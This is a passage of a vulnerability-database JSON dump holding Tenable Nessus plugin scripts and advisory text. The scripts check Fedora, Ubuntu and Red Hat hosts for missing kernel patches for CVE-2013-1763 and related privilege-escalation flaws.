Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=915052\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-March/099482.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f1f94bb6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) 
audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"kernel-3.7.9-104.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:44", "description": "This update contains a fix for the netlink out-of-bounds access issue\nwhich could allow a local user to gain privileged access. All users\nare encouraged to update.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-02-27T00:00:00", "title": "Fedora 18 : kernel-3.7.9-205.fc18 (2013-3086)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "modified": "2013-02-27T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:kernel"], "id": "FEDORA_2013-3086.NASL", "href": "https://www.tenable.com/plugins/nessus/64901", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-3086.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64901);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1763\");\n script_bugtraq_id(58137);\n script_xref(name:\"FEDORA\", value:\"2013-3086\");\n\n script_name(english:\"Fedora 18 : kernel-3.7.9-205.fc18 (2013-3086)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains a fix for the netlink out-of-bounds access issue\nwhich could allow a local user to gain privileged access. All users\nare encouraged to update.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=915052\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/099325.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?16e92895\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) 
audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"kernel-3.7.9-205.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:17", "description": "Mathias Krause discovered a bounds checking error for netlink messages\nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could\nexploit this flaw to crash the system or run programs as an\nadministrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2013-02-27T00:00:00", "title": "Ubuntu 12.10 : linux vulnerabilities (USN-1750-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank", "cpe:/o:canonical:ubuntu_linux:12.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic"], "id": "UBUNTU_USN-1750-1.NASL", "href": "https://www.tenable.com/plugins/nessus/64910", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1750-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64910);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2013-1763\");\n script_bugtraq_id(58137);\n script_xref(name:\"USN\", value:\"1750-1\");\n\n script_name(english:\"Ubuntu 12.10 : linux vulnerabilities (USN-1750-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mathias Krause discovered a bounds checking error for netlink messages\nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could\nexploit this flaw to crash the system or run programs as an\nadministrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1750-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.5-generic and / or\nlinux-image-3.5-highbank packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-1763\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1750-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-25-generic\", pkgver:\"3.5.0-25.39\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-25-highbank\", pkgver:\"3.5.0-25.39\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic / linux-image-3.5-highbank\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:12:08", "description": "Updated 
kernel-rt packages that fix several security issues and three\nbugs are now available for Red Hat Enterprise MRG 2.3.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A flaw was found in the way file permission checks for the\n'/dev/cpu/[x]/msr' files were performed in restricted root\nenvironments (for example, when using a capability-based security\nmodel). A local user with the ability to write to these files could\nuse this flaw to escalate their privileges to kernel level, for\nexample, by writing to the SYSENTER_EIP_MSR register. (CVE-2013-0268,\nImportant)\n\n* A race condition was found in the way the Linux kernel's ptrace\nimplementation handled PTRACE_SETREGS requests when the debuggee was\nwoken due to a SIGKILL signal instead of being stopped. A local,\nunprivileged user could use this flaw to escalate their privileges.\n(CVE-2013-0871, Important)\n\n* An out-of-bounds access flaw was found in the way\nSOCK_DIAG_BY_FAMILY Netlink messages were processed in the Linux\nkernel. A local, unprivileged user could use this flaw to escalate\ntheir privileges. (CVE-2013-1763, Important)\n\n* It was found that the default SCSI command filter does not\naccommodate commands that overlap across device classes. A privileged\nguest user could potentially use this flaw to write arbitrary data to\na LUN that is passed-through as read-only. (CVE-2012-4542, Moderate)\n\n* A flaw was found in the way the __skb_recv_datagram() function in\nthe Linux kernel processed payload-less socket buffers (skb) when the\nMSG_PEEK option was requested. 
A local, unprivileged user could use\nthis flaw to cause a denial of service (infinite loop).\n(CVE-2013-0290, Moderate)\n\nThe CVE-2012-4542 issue was discovered by Paolo Bonzini of Red Hat.\n\nThis update also fixes the following bugs :\n\n* There was high contention on run-queue lock when load balancing\nbefore idling, causing latency spikes on high CPU core count systems.\nWith this update, IPI is used to send notification to cores with\npending work, and the cores push the work rather than trying to pull\nit, resolving this issue. (BZ#858396)\n\n* Previously, ACPI lock was converted to an rt_mutex, leading to a\ntraceback when scheduling while atomic. With this update, ACPI lock\nhas been converted back to a raw spinlock. (BZ#909965)\n\n* Fibre Channel (FC)/iSCSI device state was set to off-line and after\na timeout, not set back to running. Such a device would not come back\nonline after a fast_io_fail or timeout. With this update, an explicit\ncheck for the device being offline has been added, and the device is\nset back to running when re-initializing, allowing devices to recover\nafter a failure or timeout. (BZ#912942)\n\nUsers should upgrade to these updated packages, which correct these\nissues. 
The system must be rebooted for this update to take effect.", "edition": 26, "published": "2014-07-22T00:00:00", "title": "RHEL 6 : MRG (RHSA-2013:0622)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0871", "CVE-2013-0268", "CVE-2013-1763", "CVE-2013-0290", "CVE-2012-4542"], "modified": "2014-07-22T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel", "p-cpe:/a:redhat:enterprise_linux:mrg-rt-release", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-rt", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo"], "id": "REDHAT-RHSA-2013-0622.NASL", "href": "https://www.tenable.com/plugins/nessus/76659", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0622. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76659);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-4542\", \"CVE-2013-0268\", \"CVE-2013-0290\", \"CVE-2013-0871\", \"CVE-2013-1763\");\n script_bugtraq_id(57838, 57964, 57986, 58088, 58137);\n script_xref(name:\"RHSA\", value:\"2013:0622\");\n\n script_name(english:\"RHEL 6 : MRG (RHSA-2013:0622)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel-rt packages that fix several security issues and three\nbugs are now available for Red Hat Enterprise MRG 2.3.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A flaw was found in the way file permission checks for the\n'/dev/cpu/[x]/msr' files were performed in restricted root\nenvironments (for example, when using a capability-based security\nmodel). A local user with the ability to write to these files could\nuse this flaw to escalate their privileges to kernel level, for\nexample, by writing to the SYSENTER_EIP_MSR register. (CVE-2013-0268,\nImportant)\n\n* A race condition was found in the way the Linux kernel's ptrace\nimplementation handled PTRACE_SETREGS requests when the debuggee was\nwoken due to a SIGKILL signal instead of being stopped. 
A local,\nunprivileged user could use this flaw to escalate their privileges.\n(CVE-2013-0871, Important)\n\n* An out-of-bounds access flaw was found in the way\nSOCK_DIAG_BY_FAMILY Netlink messages were processed in the Linux\nkernel. A local, unprivileged user could use this flaw to escalate\ntheir privileges. (CVE-2013-1763, Important)\n\n* It was found that the default SCSI command filter does not\naccommodate commands that overlap across device classes. A privileged\nguest user could potentially use this flaw to write arbitrary data to\na LUN that is passed-through as read-only. (CVE-2012-4542, Moderate)\n\n* A flaw was found in the way the __skb_recv_datagram() function in\nthe Linux kernel processed payload-less socket buffers (skb) when the\nMSG_PEEK option was requested. A local, unprivileged user could use\nthis flaw to cause a denial of service (infinite loop).\n(CVE-2013-0290, Moderate)\n\nThe CVE-2012-4542 issue was discovered by Paolo Bonzini of Red Hat.\n\nThis update also fixes the following bugs :\n\n* There was high contention on run-queue lock when load balancing\nbefore idling, causing latency spikes on high CPU core count systems.\nWith this update, IPI is used to send notification to cores with\npending work, and the cores push the work rather than trying to pull\nit, resolving this issue. (BZ#858396)\n\n* Previously, ACPI lock was converted to an rt_mutex, leading to a\ntraceback when scheduling while atomic. With this update, ACPI lock\nhas been converted back to a raw spinlock. (BZ#909965)\n\n* Fibre Channel (FC)/iSCSI device state was set to off-line and after\na timeout, not set back to running. Such a device would not come back\nonline after a fast_io_fail or timeout. With this update, an explicit\ncheck for the device being offline has been added, and the device is\nset back to running when re-initializing, allowing devices to recover\nafter a failure or timeout. 
(BZ#912942)\n\nUsers should upgrade to these updated packages, which correct these\nissues. The system must be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0622\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-4542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0268\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mrg-rt-release\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2012-4542\", \"CVE-2013-0268\", \"CVE-2013-0290\", \"CVE-2013-0871\", \"CVE-2013-1763\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2013:0622\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0622\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n 
exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"mrg-release\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MRG\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-doc-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", 